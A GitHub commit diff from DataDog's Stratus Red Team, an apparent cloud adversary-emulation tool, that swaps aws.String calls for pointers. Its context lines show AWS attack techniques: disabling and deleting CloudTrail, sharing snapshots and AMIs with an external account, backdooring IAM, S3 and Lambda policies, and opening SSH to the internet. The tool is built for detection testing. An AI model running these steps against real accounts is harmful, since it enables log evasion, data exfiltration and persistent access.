Avoid using aws.String function when a string pointer can be passed

DataDog · Jan 26, 2022 · fcae684 · fcae684
1 parent 3c27944
commit fcae684
Show file tree

Hide file tree

Showing 15 changed files with 37 additions and 45 deletions.
diff --git a/examples/custom/detonate_custom_technique.go b/examples/custom/detonate_custom_technique.go
@@ -5,7 +5,6 @@ import (
 	_ "embed"
 	"errors"
 	"fmt"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/iam"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/pkg/stratus"
@@ -38,7 +37,7 @@ func detonate(params map[string]string) error {
 	iamClient := iam.NewFromConfig(providers.AWS().GetConnection())
 
 	userResponse, err := iamClient.GetUser(context.Background(), &iam.GetUserInput{
-		UserName: aws.String(iamUserName),
+		UserName: &iamUserName,
 	})
 
 	if err != nil {

diff --git a/internal/attacktechniques/aws/credential-access/ec2-get-password-data/main.go b/internal/attacktechniques/aws/credential-access/ec2-get-password-data/main.go
@@ -64,7 +64,7 @@ func detonate(params map[string]string) error {
 		instanceId := "i-" + utils.RandomString(16)
 
 		_, err := ec2Client.GetPasswordData(context.Background(), &ec2.GetPasswordDataInput{
-			InstanceId: aws.String(instanceId),
+			InstanceId: &instanceId,
 		})
 
 		if err == nil {

diff --git a/internal/attacktechniques/aws/defense-evasion/cloudtrail-event-selectors/main.go b/internal/attacktechniques/aws/defense-evasion/cloudtrail-event-selectors/main.go
@@ -49,7 +49,7 @@ func detonate(params map[string]string) error {
 	log.Println("Applying event selector on CloudTrail trail " + trailName + " to disable logging management and data events")
 
 	_, err := cloudtrailClient.PutEventSelectors(context.Background(), &cloudtrail.PutEventSelectorsInput{
-		TrailName: aws.String(trailName),
+		TrailName: &trailName,
 		EventSelectors: []types.EventSelector{
 			{
 				ReadWriteType:           types.ReadWriteTypeReadOnly,
@@ -75,7 +75,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Reverting event selector on CloudTrail trail " + trailName)
 	_, err := cloudtrailClient.PutEventSelectors(context.Background(), &cloudtrail.PutEventSelectorsInput{
-		TrailName:      aws.String(trailName),
+		TrailName:      &trailName,
 		EventSelectors: []types.EventSelector{{IncludeManagementEvents: aws.Bool(true)}},
 	})
 

diff --git a/internal/attacktechniques/aws/defense-evasion/cloudtrail-lifecycle-rule/main.go b/internal/attacktechniques/aws/defense-evasion/cloudtrail-lifecycle-rule/main.go
@@ -48,7 +48,7 @@ func detonate(params map[string]string) error {
 
 	log.Println("Setting a short retention policy on CloudTrail S3 bucket " + bucketName)
 	_, err := s3Client.PutBucketLifecycleConfiguration(context.Background(), &s3.PutBucketLifecycleConfigurationInput{
-		Bucket: aws.String(bucketName),
+		Bucket: &bucketName,
 		LifecycleConfiguration: &types.BucketLifecycleConfiguration{
 			Rules: []types.LifecycleRule{
 				{
@@ -75,7 +75,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Reverting S3 Lifecycle Rules on CloudTrail S3 bucket " + bucketName)
 	_, err := s3Client.DeleteBucketLifecycle(context.Background(), &s3.DeleteBucketLifecycleInput{
-		Bucket: aws.String(bucketName),
+		Bucket: &bucketName,
 	})
 
 	if err != nil {

diff --git a/internal/attacktechniques/aws/defense-evasion/delete-cloudtrail/main.go b/internal/attacktechniques/aws/defense-evasion/delete-cloudtrail/main.go
@@ -4,7 +4,6 @@ import (
 	"context"
 	_ "embed"
 	"errors"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/cloudtrail"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/pkg/stratus"
@@ -45,7 +44,7 @@ func detonate(params map[string]string) error {
 	log.Println("Deleting CloudTrail trail " + trailName)
 
 	_, err := cloudtrailClient.DeleteTrail(context.Background(), &cloudtrail.DeleteTrailInput{
-		Name: aws.String(trailName),
+		Name: &trailName,
 	})
 
 	if err != nil {

diff --git a/internal/attacktechniques/aws/defense-evasion/disable-cloudtrail/main.go b/internal/attacktechniques/aws/defense-evasion/disable-cloudtrail/main.go
@@ -4,7 +4,6 @@ import (
 	"context"
 	_ "embed"
 	"errors"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/cloudtrail"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/pkg/stratus"
@@ -46,7 +45,7 @@ func detonate(params map[string]string) error {
 	log.Println("Stopping CloudTrail trail " + trailName)
 
 	_, err := cloudtrailClient.StopLogging(context.Background(), &cloudtrail.StopLoggingInput{
-		Name: aws.String(trailName),
+		Name: &trailName,
 	})
 
 	if err != nil {
@@ -62,7 +61,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Restarting CloudTrail trail " + trailName)
 	_, err := cloudtrailClient.StartLogging(context.Background(), &cloudtrail.StartLoggingInput{
-		Name: aws.String(trailName),
+		Name: &trailName,
 	})
 
 	return err

diff --git a/internal/attacktechniques/aws/exfiltration/ami-sharing/main.go b/internal/attacktechniques/aws/exfiltration/ami-sharing/main.go
@@ -50,7 +50,7 @@ func detonate(params map[string]string) error {
 
 	log.Println("Exfiltrating AMI " + amiId + " by sharing it with an external AWS account")
 	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
-		ImageId: aws.String(amiId),
+		ImageId: &amiId,
 		LaunchPermission: &types.LaunchPermissionModifications{
 			Add: amiPermissions,
 		},
@@ -69,7 +69,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Reverting exfiltration of AMI " + amiId + " by removing cross-account sharing")
 	_, err := ec2Client.ModifyImageAttribute(context.Background(), &ec2.ModifyImageAttributeInput{
-		ImageId: aws.String(amiId),
+		ImageId: &amiId,
 		LaunchPermission: &types.LaunchPermissionModifications{
 			Remove: amiPermissions,
 		},

diff --git a/internal/attacktechniques/aws/exfiltration/ebs-snapshot-share/main.go b/internal/attacktechniques/aws/exfiltration/ebs-snapshot-share/main.go
@@ -3,7 +3,6 @@ package aws
 import (
 	"context"
 	_ "embed"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/ec2"
 	"github.com/aws/aws-sdk-go-v2/service/ec2/types"
 	"github.com/datadog/stratus-red-team/internal/providers"
@@ -39,7 +38,7 @@ Detonation:
 	})
 }
 
-const ShareWithAccountId = "012345678912"
+var ShareWithAccountId = "012345678912"
 
 func detonate(params map[string]string) error {
 	ec2Client := ec2.NewFromConfig(providers.AWS().GetConnection())
@@ -51,10 +50,10 @@ func detonate(params map[string]string) error {
 	log.Println("Sharing the volume snapshot " + ourSnapshotId + " with an external AWS account...")
 
 	_, err := ec2Client.ModifySnapshotAttribute(context.Background(), &ec2.ModifySnapshotAttributeInput{
-		SnapshotId: aws.String(ourSnapshotId),
+		SnapshotId: &ourSnapshotId,
 		Attribute:  types.SnapshotAttributeNameCreateVolumePermission,
 		CreateVolumePermission: &types.CreateVolumePermissionModifications{
-			Add: []types.CreateVolumePermission{{UserId: aws.String(ShareWithAccountId)}},
+			Add: []types.CreateVolumePermission{{UserId: &ShareWithAccountId}},
 		},
 	})
 	return err
@@ -66,10 +65,10 @@ func revert(params map[string]string) error {
 
 	log.Println("Unsharing the volume snapshot " + ourSnapshotId)
 	_, err := ec2Client.ModifySnapshotAttribute(context.Background(), &ec2.ModifySnapshotAttributeInput{
-		SnapshotId: aws.String(ourSnapshotId),
+		SnapshotId: &ourSnapshotId,
 		Attribute:  types.SnapshotAttributeNameCreateVolumePermission,
 		CreateVolumePermission: &types.CreateVolumePermissionModifications{
-			Remove: []types.CreateVolumePermission{{UserId: aws.String(ShareWithAccountId)}},
+			Remove: []types.CreateVolumePermission{{UserId: &ShareWithAccountId}},
 		},
 	})
 	return err

diff --git a/internal/attacktechniques/aws/exfiltration/rds-snapshot-sharing/main.go b/internal/attacktechniques/aws/exfiltration/rds-snapshot-sharing/main.go
@@ -49,7 +49,7 @@ func detonate(params map[string]string) error {
 
 	log.Println("Sharing RDS Snapshot " + snapshotId + " with an external AWS account")
 	_, err := rdsClient.ModifyDBSnapshotAttribute(context.Background(), &rds.ModifyDBSnapshotAttributeInput{
-		DBSnapshotIdentifier: aws.String(snapshotId),
+		DBSnapshotIdentifier: &snapshotId,
 		AttributeName:        aws.String("restore"),
 		ValuesToAdd:          AccountIdToShareWith,
 	})
@@ -67,7 +67,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Un-sharing RDS Snapshot " + snapshotId + " with an external AWS account")
 	_, err := rdsClient.ModifyDBSnapshotAttribute(context.Background(), &rds.ModifyDBSnapshotAttributeInput{
-		DBSnapshotIdentifier: aws.String(snapshotId),
+		DBSnapshotIdentifier: &snapshotId,
 		AttributeName:        aws.String("restore"),
 		ValuesToRemove:       AccountIdToShareWith,
 	})

diff --git a/internal/attacktechniques/aws/exfiltration/s3-bucket-backdoor-bucket-policy/main.go b/internal/attacktechniques/aws/exfiltration/s3-bucket-backdoor-bucket-policy/main.go
@@ -4,7 +4,6 @@ import (
 	"context"
 	_ "embed"
 	"fmt"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/s3"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/pkg/stratus"
@@ -55,8 +54,8 @@ func detonate(params map[string]string) error {
 
 	log.Println("Backdooring bucket policy of " + bucketName)
 	_, err := s3Client.PutBucketPolicy(context.Background(), &s3.PutBucketPolicyInput{
-		Bucket: aws.String(bucketName),
-		Policy: aws.String(policy),
+		Bucket: &bucketName,
+		Policy: &policy,
 	})
 
 	return err
@@ -68,7 +67,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Removing malicious bucket policy on " + bucketName)
 	_, err := s3Client.DeleteBucketPolicy(context.Background(), &s3.DeleteBucketPolicyInput{
-		Bucket: aws.String(bucketName),
+		Bucket: &bucketName,
 	})
 
 	return err

diff --git a/internal/attacktechniques/aws/exfiltration/securitygroup-open-port-22-to-internet/main.go b/internal/attacktechniques/aws/exfiltration/securitygroup-open-port-22-to-internet/main.go
@@ -49,7 +49,7 @@ func detonate(params map[string]string) error {
 	log.Println("Opening port 22 from the Internet on " + securityGroupId)
 
 	_, err := ec2Client.AuthorizeSecurityGroupIngress(context.Background(), &ec2.AuthorizeSecurityGroupIngressInput{
-		GroupId:    aws.String(securityGroupId),
+		GroupId:    &securityGroupId,
 		CidrIp:     aws.String("0.0.0.0/0"),
 		FromPort:   aws.Int32(22),
 		ToPort:     aws.Int32(22),
@@ -73,7 +73,7 @@ func revert(params map[string]string) error {
 	log.Println("Closing port 22 from the Internet on " + securityGroupId)
 
 	_, err := ec2Client.RevokeSecurityGroupIngress(context.Background(), &ec2.RevokeSecurityGroupIngressInput{
-		GroupId:    aws.String(securityGroupId),
+		GroupId:    &securityGroupId,
 		CidrIp:     aws.String("0.0.0.0/0"),
 		FromPort:   aws.Int32(22),
 		ToPort:     aws.Int32(22),

diff --git a/internal/attacktechniques/aws/persistence/backdoor-lambda-function/main.go b/internal/attacktechniques/aws/persistence/backdoor-lambda-function/main.go
@@ -39,18 +39,18 @@ Detonation:
 	})
 }
 
-const policyStatementId = "backdoor"
+var policyStatementId = "backdoor"
 
 func detonate(params map[string]string) error {
 	lambdaClient := lambda.NewFromConfig(providers.AWS().GetConnection())
 	lambdaFunctionName := params["lambda_function_name"]
 
 	log.Println("Backdooring the resource-based policy of the Lambda function " + lambdaFunctionName)
 	result, err := lambdaClient.AddPermission(context.Background(), &lambda.AddPermissionInput{
-		FunctionName: aws.String(lambdaFunctionName),
+		FunctionName: &lambdaFunctionName,
 		Action:       aws.String("lambda:InvokeFunction"),
 		Principal:    aws.String("*"), // I intended to share it only with a specific account ID, but couldn't get it working.
-		StatementId:  aws.String(policyStatementId),
+		StatementId:  &policyStatementId,
 	})
 
 	if err != nil {
@@ -68,8 +68,8 @@ func revert(params map[string]string) error {
 
 	log.Println("Removing the backdoor statement in the resource-based policy of the Lambda function " + lambdaFunctionName)
 	_, err := lambdaClient.RemovePermission(context.Background(), &lambda.RemovePermissionInput{
-		FunctionName: aws.String(lambdaFunctionName),
-		StatementId:  aws.String(policyStatementId),
+		FunctionName: &lambdaFunctionName,
+		StatementId:  &policyStatementId,
 	})
 
 	if err != nil {

diff --git a/internal/attacktechniques/aws/persistence/iam-role-backdoor-existing/main.go b/internal/attacktechniques/aws/persistence/iam-role-backdoor-existing/main.go
@@ -4,7 +4,6 @@ import (
 	"context"
 	_ "embed"
 	"errors"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/iam"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/pkg/stratus"
@@ -53,8 +52,8 @@ func detonate(params map[string]string) error {
 
 	log.Println("Backdooring IAM role " + roleName + " by allowing sts:AssumeRole from an external AWS account")
 	_, err := iamClient.UpdateAssumeRolePolicy(context.Background(), &iam.UpdateAssumeRolePolicyInput{
-		RoleName:       aws.String(roleName),
-		PolicyDocument: aws.String(maliciousIamPolicy),
+		RoleName:       &roleName,
+		PolicyDocument: &maliciousIamPolicy,
 	})
 
 	if err != nil {

diff --git a/internal/attacktechniques/aws/persistence/iam-user-backdoor-existing/main.go b/internal/attacktechniques/aws/persistence/iam-user-backdoor-existing/main.go
@@ -3,7 +3,6 @@ package aws
 import (
 	"context"
 	_ "embed"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/iam"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/pkg/stratus"
@@ -44,7 +43,7 @@ func detonate(params map[string]string) error {
 
 	log.Println("Creating access key on legit IAM user to simulate backdoor")
 	result, err := iamClient.CreateAccessKey(context.Background(), &iam.CreateAccessKeyInput{
-		UserName: aws.String(userName),
+		UserName: &userName,
 	})
 	if err != nil {
 		return err
@@ -60,18 +59,18 @@ func revert(params map[string]string) error {
 
 	log.Println("Removing access key from IAM user " + userName)
 	result, err := iamClient.ListAccessKeys(context.Background(), &iam.ListAccessKeysInput{
-		UserName: aws.String(userName),
+		UserName: &userName,
 	})
 	if err != nil {
 		return err
 	}
-	
+
 	for i := range result.AccessKeyMetadata {
 		accessKeyId := result.AccessKeyMetadata[i].AccessKeyId
 		log.Println("Removing access key " + *accessKeyId)
 		_, err := iamClient.DeleteAccessKey(context.Background(), &iam.DeleteAccessKeyInput{
 			AccessKeyId: accessKeyId,
-			UserName:    aws.String(userName),
+			UserName:    &userName,
 		})
 		if err != nil {
 			log.Println("failed: " + err.Error())

diff --git a/internal/attacktechniques/aws/persistence/iam-user-create-login-profile/main.go b/internal/attacktechniques/aws/persistence/iam-user-create-login-profile/main.go
@@ -4,7 +4,6 @@ import (
 	"context"
 	_ "embed"
 	"errors"
-	"github.com/aws/aws-sdk-go-v2/aws"
 	"github.com/aws/aws-sdk-go-v2/service/iam"
 	"github.com/datadog/stratus-red-team/internal/providers"
 	"github.com/datadog/stratus-red-team/internal/utils"
@@ -48,8 +47,8 @@ func detonate(params map[string]string) error {
 
 	log.Println("Creating a login profile on IAM user " + userName)
 	_, err := iamClient.CreateLoginProfile(context.Background(), &iam.CreateLoginProfileInput{
-		UserName:              aws.String(userName),
-		Password:              aws.String(password),
+		UserName:              &userName,
+		Password:              &password,
 		PasswordResetRequired: false,
 	})
 	if err != nil {
@@ -70,7 +69,7 @@ func revert(params map[string]string) error {
 
 	log.Println("Removing the login profile on IAM user " + userName)
 	_, err := iamClient.DeleteLoginProfile(context.Background(), &iam.DeleteLoginProfileInput{
-		UserName: aws.String(userName),
+		UserName: &userName,
 	})
 	if err != nil {
 		return errors.New("unable to remove IAM login profile: " + err.Error())